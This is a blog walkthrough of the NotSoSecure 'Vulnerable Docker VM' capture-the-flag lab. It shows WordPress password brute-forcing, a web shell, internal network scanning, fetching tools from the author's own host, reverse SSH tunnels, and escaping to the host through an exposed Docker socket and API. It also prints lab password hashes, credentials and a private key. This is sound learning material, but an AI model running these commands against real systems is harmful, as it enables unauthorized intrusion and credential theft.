
In the information security world, there are so called CTF (Capture The Flag) challenges. This is mind sport, where you should hack or somehow extract the information from computer systems, in most cases connected with the internet or other network. Strangely, but I never participated in this kind of stuff. Several days ago the company named NotSoSecure posted the CTF challenge called Vulnerable Docker VM. Docker becomes widespread these days, so I decided to try out both Docker and that CTF thing. The quest itself was not competitive — there are no winners or losers, no time limit, so there was no pressure, what is good for beginners like me. VirtualBox image with some Docker infrastructure is provided for you. The goal is to gain control over host system and to find 3 flags. I managed to find only 2 flags and escape from Docker. Below you will find the solution, so if you want to try the challenge yourself, then stop here.
After importing the OVA image and starting the VM, I see Docker ASCII logo and the IP address:

For convenience, let’s add it to /etc/hosts
192.168.2.16 ctf
First step is obvious, let’s scan the IP address for listening network services:
$ sudo nmap ctf PORT STATE SERVICE 22/tcp open ssh 8000/tcp open http-alt
Maybe, we can bruteforce SSH password? I used brutessh.py with 10 million password list:
python2 brutessh.py -h ctf -u root -d 10_million_password_list_top_1000000.txt
No luck here.
Let’s go ahead and open http://ctf:8000 in web browser. We’ve got WordPress:

From HTTP headers and HTML we can figure out software versions:
Apache/2.4.10 PHP/5.6.31 (latest version, at the moment of writing this article) Wordpress 4.8.1 (latest version)
Clicking here and there, I noticed some details:

Home leads to http://192.168.0.2:8000
User is BOB.
I was hoping to reset BOB’s password by requesting secret link and sniffing it out of the traffic using tcpdump.
Unfortunately, they disabled mail() function:
The email could not be sent. Possible reason: your host may have disabled the mail() function.
WordPress is famous for its extensibility. Maybe, there are some vulnerable plugins installed? I’ve googled “wordpress vulnerability scanner” and found wpscan.
Making use of it:
$ docker pull wpscanteam/wpscan
$ docker run -it --rm wpscanteam/wpscan -u http://ctf:8000 --enumerate
…
[!] Full Path Disclosure (FPD) in 'http://ctf:8000/wp-includes/rss-functions.php'
…
[!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8215
Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
[i] Fixed in: 3.1.5
From here we understand that WordPress is installed under /var/www/html:
Fatal error: Call to undefined function _deprecated_file() in /var/www/html/wp-includes/rss-functions.php on line 8
Also, there is Akismet plugin with minor XSS vulnerability. Let’s skip it for now and better try to bruteforce BOB’s password:
$ docker run -it --rm -v ~/notsosecure:/notsosecure wpscanteam/wpscan -u http://ctf:8000 --wordlist /notsosecure/10_million_password_list_top_1000000.txt --username bob [+] [SUCCESS] Login : bob Password : Welcome1 Brute Forcing 'bob' Time: 00:02:03 < > (7965 / 1000000) 0.79% ETA: 04:17:02 +----+-------+------+----------+ | Id | Login | Name | Password | +----+-------+------+----------+ | | bob | | Welcome1 | +----+-------+------+----------+
Voilà! We’ve got access to WordPress admin panel.

Just by clicking here and there, I found the first flag:
It is time to install some shell. WPTerm is very nice:

Apparently, there is the exploit for Linux 3.13. That’s encouraging, especially if you have gcc on the system, but let’s keep easy track for now.
Database credentials:
www-data:/var/www/html $ grep DB_ wp-config.php define('DB_NAME', 'wordpress'); define('DB_USER', 'wordpress'); define('DB_PASSWORD', 'WordPressISBest'); define('DB_HOST', 'db:3306');
Trying to reset password for www-data user, no luck:
www-data:/var/www/html $ echo 123 | passwd www-data (current) UNIX password: passwd: Authentication token manipulation error passwd: password unchanged Changing password for www-data. www-data:/var/www/html $ echo "www-data:123" | chpasswd chpasswd: (user www-data) pam_chauthtok() failed, error: Authentication token manipulation error chpasswd: (line 1, user www-data) password not changed Changing password for www-data.
Let’s explore local network:
www-data:/var/www/html $ ip r default via 172.18.0.1 dev eth0 172.18.0.0/16 dev eth0 proto kernel scope link src 172.18.0.4 www-data:/var/www/html $ ip a 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever 9: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default link/ether 02:42:ac:12:00:04 brd ff:ff:ff:ff:ff:ff inet 172.18.0.4/16 scope global eth0 valid_lft forever preferred_lft forever www-data:/var/www/html $ cat /etc/resolv.conf nameserver 127.0.0.11 options ndots:0 www-data:/var/www/html $ ss -ntp State Recv-Q Send-Q Local Address:Port Peer Address:Port ESTAB 0 0 172.18.0.4:80 192.168.2.12:50078 ESTAB 0 0 172.18.0.4:54418 172.18.0.3:3306 users:(("ss",pid=169,fd=14))
Seems like MySQL server is running on 172.18.0.3.
Just ping first IP addresses in this subnet for other hosts:
ping -c1 172.18.0.1 ...
Docker infrastructure looks like this:
127.0.0.11 = DNS 172.18.0.1 = default gateway 172.18.0.2 = ? 172.18.0.3 = database 172.18.0.4 = wordpress <- we are here
Request SSH banner from default gateway:
www-data:/var/www/html $ curl -s 172.18.0.1:22 SSH-2.0-OpenSSH_6.6p1 Ubuntu-2ubuntu1
Host machine is giving us the same SSH banner:
$ curl -s ctf:22 SSH-2.0-OpenSSH_6.6p1 Ubuntu-2ubuntu1
With high probability, 172.18.0.1 is the IP address of host machine from Docker network side.
Also, this port forwarding is obvious:
ctf:8000 → 172.18.0.4:80
Noticing two more interesting banners:
$ curl -s 172.18.0.2:22 SSH-2.0-ssh2js0.0.23srv $ curl -s 172.18.0.3:3306 5.7.19...
Let’s download adminer – similar to phpMyAdmin, but packaged just in one single file:
$ curl -L -o adminer.php https://github.com/vrana/adminer/releases/download/v4.3.1/adminer-4.3.1-en.php
Logging in with password, which was revealed earlier:

Unfortunately, I did not found anything interesting in the database.
For more thorough network scan, we need more powerful tool – nmap. Although we don’t have access to package manager, but we could still download and run it. To make use of it, I downloaded RPM package, extracted nmap binary and uploaded it to my own host on the internet. Downloading it like this:
$ mkdir ctf ; cd ctf $ curl -o nmap http://my-secret-host.com/nmap $ chmod +x nmap
It’s fun time:
$ ./nmap -p- 127.0.0.11 53/tcp open domain 80/tcp open http $ ./nmap -p- 172.18.0.1 22/tcp open ssh 2375/tcp open unknown (!!!) 8000/tcp open unknown $ ./nmap -p- 172.18.0.2 22/tcp open ssh 8022/tcp open unknown (!!!) $ ./nmap -p- 172.18.0.3 3306/tcp open mysql $ ./nmap -p- 172.18.0.4 80/tcp open http
2375 and 8022 opportunities seem huge to me!
What’s on the port 8022?
$ curl -s 172.18.0.2:8022 ... <title>Docker-SSH</title> ...
Google tells me about Docker-SSH – some tool for accessing console of Docker containers. It would be great to connect to this SSH. Small problem – it is located inside of the private network. Fortunately, we can bypass this by establishing reverse SSH tunnel from the host, to which we already have access.
To create reverse SSH tunnel, we need SSH client. Let’s download it following the same procedure as for nmap:
$ curl -o ssh-keygen http://my-secret-host.com/ssh-keygen $ curl -o ssh http://my-secret-host.com/ssh $ chmod +x ssh*
We need to generate keypair:
$ yes | ./ssh-keygen -P '' -f /var/www/html/ctf/id_rsa -t rsa
Now we’ve got id_rsa (private key) and id_rsa.pub (public). Let’s grant access to that new public key by adding it to ~/.ssh/authorized_keys on attacker machine (our own).
Now, creating reverse SSH tunnel is straightforward:
$ ./ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o GlobalKnownHostsFile=/dev/null -v -i id_rsa -R 8022:172.18.0.2:8022 -fN oioki@192.168.2.12
(here 192.168.2.12 is our own host)
Now we can connect to Docker-SSH just by opening localhost:8022 in our browser:

Seems like, 172.18.0.2:8022 gives web access to console of 172.18.0.3 container (database server).
Let’s install usual SSH server for more convenient access:
$ apt-get update $ apt-get install vim openssh-client openssh-server
Remove unneeded restrictions and change password for root:
$ vim /etc/ssh/sshd_config ... PermitRootLogin yes UsePrivilegeSeparation no $ passwd (type 123, for example) $ /usr/sbin/sshd
Now SSH server is working, but again, it is in the private network. Applying the same solution, reverse SSH tunnel:
$ ssh -R 2222:127.0.0.1:22 -fN oioki@192.168.2.12
(here we should enter password for our attacker host)
At last, we’ve got “normal” SSH access to this host:

Stalkering the server, I found interesting file /var/run/docker.sock. Seems like, unix socket of the host docker process appeared inside the container somehow. This is huge vulnerability.
To exploit it, let’s use some client capable of working with unix sockets, for example curl or netcat:
$ apt-get install netcat-openbsd root@13f0a3bb2706:~# echo -e "GET /images/json HTTP/1.0\r\n" | nc -U /var/run/docker.sock HTTP/1.0 200 OK Api-Version: 1.30 Content-Type: application/json Docker-Experimental: false Ostype: linux Server: Docker/17.06.0-ce (linux) Date: Mon, 11 Sep 2017 21:25:15 GMT Content-Length: 1018 [{"Containers":-1,"Created":1501805621,"Id":"sha256:c4260b289fc788fd3f66a2a1bb0e7697b62511861626a39c7d0676b8909afc20","Labels":{},"ParentId":"","RepoDigests":["wordpress@sha256:632c5f09a3de6fa711b208126bcef405e844a13f7cb38a83b0045043f4b1266f"],"RepoTags":["wordpress:latest"],"SharedSize":-1,"Size":405873668,"VirtualSize":405873668},{"Containers":-1,"Created":1501052770,"Id":"sha256:c73c7527c03a13729a6bba88a3251c95629e8036c0ccf17dadefb4c5f077a315","Labels":{},"ParentId":"","RepoDigests":["mysql@sha256:96edf37370df96d2a4ee1715cc5c7820a0ec6286551a927981ed50f0273d9b43"],"RepoTags":["mysql:5.7"],"SharedSize":-1,"Size":412365478,"VirtualSize":412365478},{"Containers":-1,"Created":1492156751,"Id":"sha256:7d3ecb48134e41ac56003879ae8b0faa7e8931b927a3af28af82504434b9c9c4","Labels":{},"ParentId":"","RepoDigests":["jeroenpeeters/docker-ssh@sha256:a1c8cefef3e2a7242970ef841acfcb9ead47355bc87a9c5c25627659e1c0b2b9"],"RepoTags":["jeroenpeeters/docker-ssh:latest"],"SharedSize":-1,"Size":43209635,"VirtualSize":43209635}]
If you were starting Easy mode, then you could achieve the same results by requesting REST API, which is also available from inside of the container:
root@13f0a3bb2706:~# curl 172.18.0.1:2375/images/json [{"Containers":-1,"Created":1501805621,"Id":"sha256:c4260b289fc788fd3f66a2a1bb0e7697b62511861626a39c7d0676b8909afc20","Labels":{},"ParentId":"","RepoDigests":["wordpress@sha256:632c5f09a3de6fa711b208126bcef405e844a13f7cb38a83b0045043f4b1266f"],"RepoTags":["wordpress:latest"],"SharedSize":-1,"Size":405873668,"VirtualSize":405873668},{"Containers":-1,"Created":1501052770,"Id":"sha256:c73c7527c03a13729a6bba88a3251c95629e8036c0ccf17dadefb4c5f077a315","Labels":{},"ParentId":"","RepoDigests":["mysql@sha256:96edf37370df96d2a4ee1715cc5c7820a0ec6286551a927981ed50f0273d9b43"],"RepoTags":["mysql:5.7"],"SharedSize":-1,"Size":412365478,"VirtualSize":412365478},{"Containers":-1,"Created":1492156751,"Id":"sha256:7d3ecb48134e41ac56003879ae8b0faa7e8931b927a3af28af82504434b9c9c4","Labels":{},"ParentId":"","RepoDigests":["jeroenpeeters/docker-ssh@sha256:a1c8cefef3e2a7242970ef841acfcb9ead47355bc87a9c5c25627659e1c0b2b9"],"RepoTags":["jeroenpeeters/docker-ssh:latest"],"SharedSize":-1,"Size":43209635,"VirtualSize":43209635}]
To make working with Docker more convenient, let’s install docker client following official manual.
Look, we can do this from inside of the docker container:
root@13f0a3bb2706:~# docker images REPOSITORY TAG IMAGE ID CREATED SIZE wordpress latest c4260b289fc7 5 weeks ago 406MB mysql 5.7 c73c7527c03a 6 weeks ago 412MB jeroenpeeters/docker-ssh latest 7d3ecb48134e 5 months ago 43.2MB root@13f0a3bb2706:~# docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES 8f4bca8ef241 wordpress:latest "docker-entrypoint..." 2 weeks ago Up 4 hours 0.0.0.0:8000->80/tcp content_wordpress_1 13f0a3bb2706 mysql:5.7 "docker-entrypoint..." 2 weeks ago Up 4 hours 3306/tcp content_db_1 b90babce1037 jeroenpeeters/docker-ssh "npm start" 3 weeks ago Up 4 hours 22/tcp, 8022/tcp content_ssh_1 root@13f0a3bb2706:~# docker exec -it 8f4bca8ef241 hostname 8f4bca8ef241 root@13f0a3bb2706:~# docker exec -it b90babce1037 hostname b90babce1037
Indeed, we have 3 docker containers: wordpress, database and ssh proxy.
To gain access to docker host filesystem, we could use this exploit:
root@13f0a3bb2706:~# docker run -v /:/hostOS -i -t chrisfosterelli/rootplease Unable to find image 'chrisfosterelli/rootplease:latest' locally latest: Pulling from chrisfosterelli/rootplease 2de59b831a23: Pull complete 354c3661655e: Pull complete 91930878a2d7: Pull complete a3ed95caeb02: Pull complete 489b110c54dc: Pull complete Digest: sha256:07f8453356eb965731dd400e056504084f25705921df25e78b68ce3908ce52c0 Status: Downloaded newer image for chrisfosterelli/rootplease:latest You should now have a root shell on the host OS Press Ctrl-D to exit the docker instance / shell #
The flag could be found instantly:
# ls / bin boot dev etc flag_3 home initrd.img lib lib64 lost+found media mnt opt proc root run sbin srv sys tmp usr var vmlinuz # cat /flag_3 d867a73c70770e73b65e6949dd074285dfdee80a8db333a7528390f6 Awesome so you reached host Well done Now the bigger challenge try to understand and fix the bugs. If you want more attack targets look at the shadow file and try cracking passwords :P Thanks for playing the challenges we hope you enjoyed all levels You can send your suggestions bricks bats criticism or appreciations on vulndocker@notsosecure.com
We can do little more. Let’s have a look, who has passwords, and change them:
# vipw -s root:$6$i8GUrrmW$GE/x1EEwKgMvvTS0IuOfd4jkrP9ufQrYxBdvAXh72ETmC.PZv.0gzb9Fxfs2y5CxmKiJlRUJVr5p0k3TxgPEG0:17394:0:99999:7::: ... whale:$6$RvS0tNRs$gV2mxTeBwobOo9h1LZ59aGb1Gy7E83.2Lb5IsmPupTKxLqfoLAMLAKPMskQ1s52puOQoXzuLhrhM.j7TkTAxp1:17394:0:99999:7::: # passwd (type 123, for example) # passwd whale (type 123)
Now we can login to VirtualBox SSH and have true root access:
oioki@mars ~/notsosecure $ ssh whale@ctf whale@ctf's password: (123) Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-128-generic x86_64) ... whale@vulndocker:~$ su Password: (123) root@vulndocker:/home/whale# ip a 1: lo: <loopback,up,lower_up> mtu 65536 qdisc noqueue state UNKNOWN group default link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: eth0: <broadcast,multicast,up,lower_up> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 link/ether 08:00:27:d9:c7:82 brd ff:ff:ff:ff:ff:ff inet 192.168.2.16/24 brd 192.168.2.255 scope global eth0 valid_lft forever preferred_lft forever inet6 fe80::a00:27ff:fed9:c782/64 scope link valid_lft forever preferred_lft forever 3: br-19017deceb88: <broadcast,multicast,up,lower_up> mtu 1500 qdisc noqueue state UP group default link/ether 02:42:b0:f9:51:31 brd ff:ff:ff:ff:ff:ff inet 172.18.0.1/16 scope global br-19017deceb88 valid_lft forever preferred_lft forever inet6 fe80::42:b0ff:fef9:5131/64 scope link valid_lft forever preferred_lft forever 4: docker0: <no-carrier,broadcast,multicast,up> mtu 1500 qdisc noqueue state DOWN group default link/ether 02:42:f7:dd:db:1f brd ff:ff:ff:ff:ff:ff inet 172.17.0.1/16 scope global docker0 valid_lft forever preferred_lft forever inet6 fe80::42:f7ff:fedd:db1f/64 scope link valid_lft forever preferred_lft forever 6: veth6dbe194: <broadcast,multicast,up,lower_up> mtu 1500 qdisc noqueue master br-19017deceb88 state UP group default link/ether b2:c2:7d:87:d3:25 brd ff:ff:ff:ff:ff:ff inet6 fe80::b0c2:7dff:fe87:d325/64 scope link valid_lft forever preferred_lft forever 8: veth13f2925: <broadcast,multicast,up,lower_up> mtu 1500 qdisc noqueue master br-19017deceb88 state UP group default link/ether a6:6a:d0:ef:af:f4 brd ff:ff:ff:ff:ff:ff inet6 fe80::a46a:d0ff:feef:aff4/64 scope link valid_lft forever preferred_lft forever 10: veth4c53066: <broadcast,multicast,up,lower_up> mtu 1500 qdisc noqueue master br-19017deceb88 state UP group default link/ether 3e:77:67:71:64:cc brd ff:ff:ff:ff:ff:ff inet6 fe80::3c77:67ff:fe71:64cc/64 scope link valid_lft forever preferred_lft forever </broadcast,multicast,up,lower_up></broadcast,multicast,up,lower_up></broadcast,multicast,up,lower_up></no-carrier,broadcast,multicast,up></broadcast,multicast,up,lower_up></broadcast,multicast,up,lower_up></loopback,up,lower_up>
If you are interested, how Docker environment were made, you can have a look at /home/vulndock/content/docker-compose.yml.
At this point, this is so far I was able to reach. I did not managed to find second flag, but here are some other interesting things I’ve found:
1. Crack MySQL root password
In the MySQL container, we have direct access to raw MySQL data. Therefore, we could look up password hashes:
$ apt-get install binutils $ strings /var/lib/mysql/mysql/user.MYD localhost root mysql_native_password) *E83AAF14C281BCB6E65977C59B585815ED29792B root mysql_native_password) localhost mysql.sys mysql_native_password) *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE *E83AAF14C281BCB6E65977C59B585815ED29792B % wordpress mysql_native_password) *A2C249A619E6B32CE95478C25AACB8E8C14560B8
Password for root database user can be googled very easily: Peaches123
2. John the Ripper
They were teasing me like “try cracking passwords”. Here are contents of shadow file with password hashes:
root:$6$i8GUrrmW$GE/x1EEwKgMvvTS0IuOfd4jkrP9ufQrYxBdvAXh72ETmC.PZv.0gzb9Fxfs2y5CxmKiJlRUJVr5p0k3TxgPEG0:17394:0:99999:7::: whale:$6$RvS0tNRs$gV2mxTeBwobOo9h1LZ59aGb1Gy7E83.2Lb5IsmPupTKxLqfoLAMLAKPMskQ1s52puOQoXzuLhrhM.j7TkTAxp1:17394:0:99999:7:::

Looks like that’s not so trivial:
3. MySQL SSL
There are bunch of *.pem files in /var/lib/mysql of MySQL container:
/ $ docker exec -ti 13f0a3bb2706 ls -la /var/lib/mysql total 188488 drwxr-xr-x 6 mysql mysql 4096 Sep 12 21:05 . drwxr-xr-x 32 root root 4096 Sep 12 21:20 .. -rw-r----- 1 mysql mysql 56 Aug 16 17:39 auto.cnf -rw------- 1 mysql mysql 1679 Aug 16 17:39 ca-key.pem -rw-r--r-- 1 mysql mysql 1074 Aug 16 17:39 ca.pem -rw-r--r-- 1 mysql mysql 1078 Aug 16 17:39 client-cert.pem -rw------- 1 mysql mysql 1675 Aug 16 17:39 client-key.pem -rw-r----- 1 mysql mysql 667 Aug 22 14:19 ib_buffer_pool -rw-r----- 1 mysql mysql 50331648 Sep 12 21:50 ib_logfile0 -rw-r----- 1 mysql mysql 50331648 Aug 16 17:39 ib_logfile1 -rw-r----- 1 mysql mysql 79691776 Sep 12 21:50 ibdata1 -rw-r----- 1 mysql mysql 12582912 Sep 12 21:50 ibtmp1 drwxr-x--- 2 mysql mysql 4096 Aug 16 17:39 mysql drwxr-x--- 2 mysql mysql 4096 Aug 16 17:39 performance_schema -rw------- 1 mysql mysql 1675 Aug 16 17:39 private_key.pem -rw-r--r-- 1 mysql mysql 451 Aug 16 17:39 public_key.pem -rw-r--r-- 1 mysql mysql 1078 Aug 16 17:39 server-cert.pem -rw------- 1 mysql mysql 1679 Aug 16 17:39 server-key.pem drwxr-x--- 2 mysql mysql 12288 Aug 16 17:39 sys drwxr-x--- 2 mysql mysql 4096 Aug 19 04:35 wordpress
Unfortunately, I could not figure out what are they for. Maybe they are just a part of distribution? Silly attempt – setup OpenSSL server and client:
$ sudo openssl s_server -accept 443 -cert server-cert.pem -key server-key.pem -CAfile ca.pem -no_ecdhe $ openssl s_client -connect localhost:443 -cert client-cert.pem -key client-key.pem
4. Mysterious private key
It is located at SSH proxy container. What is its purpose?
/ $ docker exec b90babce1037 cat id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAwvgvBtMwnnHfKwWq/V+m0ioC+jnEv6vkYRtgsdJGsdssCXxX dw0Qxq7KDPxWIO9uPHr0FHFshHIf5huxNbv3xWyn2kWFX+nsflGGa5+j5z9qXI/c 1li2BhpE+trBatL/cbOb7n+gpViexJOxh/HLRNkMi1lOX1G2ZYItEjVTub/V+t+Y GJU6xW47Z20iT9lv4t1mu/TNONLZY/Si2n8Qpo5iTcJOzAgzX3zQhyktkTAb2SaM ExLkLW34QcWrpXSU23cNJraw81oPl9cNOiKb36w8B7HJdd1v3hSxe+iD5u4rZ9Hq idnrRuYfCxwQCtDhg4IvMfF1pEI97yWUv08xzQIDAQABAoIBAHGQF+w0xQP1NdUc Vw2AUm3l1JglX+l42OyLAtZwsYbVL6BS0atha90eYEgSDqTecWo+/76MlnXK97OT e7PdyaMv99EWX2qPmZW2LMKxWMnQUUaa8TnUsCl70aQAGVr8jZeP04qmwk6tAMVl danGd+yhNEJSgWjZ8pDLsy8A6sSs54YCPzbEnZVogcU8oyY7+aF4UJOMYJLtbUix a7mQAc8HYA+grnuTr/ogIHqNazlnKYYxFchcLa3I2W44fSKyWqk2r1odvQeEys/W MHu4yf+MpXVO+AJ9HFOmp8yGhGVWowxIhB/Sie7Rn35zhKIHhIdL7nL8yztXwzds zygyZaECgYEA+2SIMEVRX+gpd2QOj+Z/6weFXzBMXthTIHexHsaFX0ZgSLSgwADI j7N452qRbhpVcKI3Hst0VY5NdNgIeQroNutyrp2KOggxpprYYTWdqeMr67eHvNOV +KxomoZJXmNub1l7G4ZL+gw4cpc274x8LX6y4hIIj7XNZVosU+34vskCgYEAxort x5kVDlJafjBTZ0AlMMbc9+aP8hLMsis5fLioRpj7Nj9ctOrmt3aov2aM9zVUt6p0 PtsO0FSMnhxC90/dEXtYVc/wJaEx9SqCsmqDhoCEcCQ/m6ZNWSh27rT774I7M0En 3lJ2kowP/iYDui2nJ07nm0z3w7wt47aQvPcESOUCgYEArSEJIaU7a39pv01rMfMe OXCOi4Wpss/sP7nugzFY/Mps2OV8p35ioYSKSWV9DoSYPt+Ycl7PmXRNJ6D4BNRc JCZ2bocUgO7PstuFFT1lfXBz+PwGQSa+a+ngiDrfIF/92DWZsNUGUghEf7ZgIQ1x H6vX6hVdTAt6jshRKuQCoPECgYARH2IqWJVsSsXrJBfNS8bpUf00k/nOErj8lKW8 j+BTVlYz83r3T1reb6lV+G4n072eqWClGxdH+EK4UA+mbIjQPSb9H5XCaQh58FSd NnppWyQQ1890iP8atVasd4dSvJSGcxQRJGN9d/7ZGEYyBEXqKe/ngNfNValPfis1 YMhJ0QKBgE9z0dnD3nHLQZ+3uF8BlOmlIETum4UNjenSEMQDu7S2zkK5p5cXS+m1 6lJr2MfmTzQq9vRq3bX2NdPx5j3L6wW9axkM8dE4DqMWj6TR2SQZB/cm6nI/XKbE OeTtnGCO90jr//IVsdbx/J3s5pDjToZ5gJvZ/SQrNJXASpbs0hPI -----END RSA PRIVATE KEY-----
5. Host SSH allow for containement
It is allowed passwordless SSH access to docker host for some key. Maybe it is just leftover from NotSoSecure team?
root@e330142972c4:~# cat .ssh/authorized_keys ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCpT+U/LoYIzigCo5HFQR1vzSCXwQciu/pGPDpfj46v4aP6GYwel2jGn0waWViSzVk99CXVXneO0akbwLIyrrXluAcvng6f5vjRWPM46DGibV06ypAI6Y0neRC+oSF2b4D1mizcSlbGqJYNr00YcKETDNr8QFQt0eFS8KmwovtP5pkg3GiotOIbWEFOeQ8V6N/ShNl5wuRuMosESlP+RpzgawSE7KcoTzAJ6LqmUR4wWeW1XfLMaGD6Z4QIkofNyghlQ/SsNDYweSuztM2kqdtVDsEPNCiLgVCQsAWaBiL6sTSWf2ywJtiRocOg6BHy8IymljltOjyQf8g+ky2CLaGx containement@vulndocker.notsosecure.com
6. Steganography?
Exploring the host system, I’ve found interesting file /boot/grub/nss.jpg. It is used as a grub boot menu background. That’s what different tools tell about the file:
$ file nss.jpg nss.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=9, orientation=upper-left, xresolution=122, yresolution=130, resolutionunit=2, software=Pixelmator 3.6, datetime=2017:08:19 17:08:59], baseline, precision 8, 640x427, frames 3 $ binwalk nss.jpg DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 JPEG image data, JFIF standard 1.01 30 0x1E TIFF image data, big-endian, offset of first image directory: 8 461 0x1CD Unix path: /www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http:// 5132 0x140C Copyright string: "Copyright 2007 Apple Inc., all rights reserved."
I had no ideas how to extract hidden information from this file (if any), so I’ve stopped there.
Maybe you can crack it?
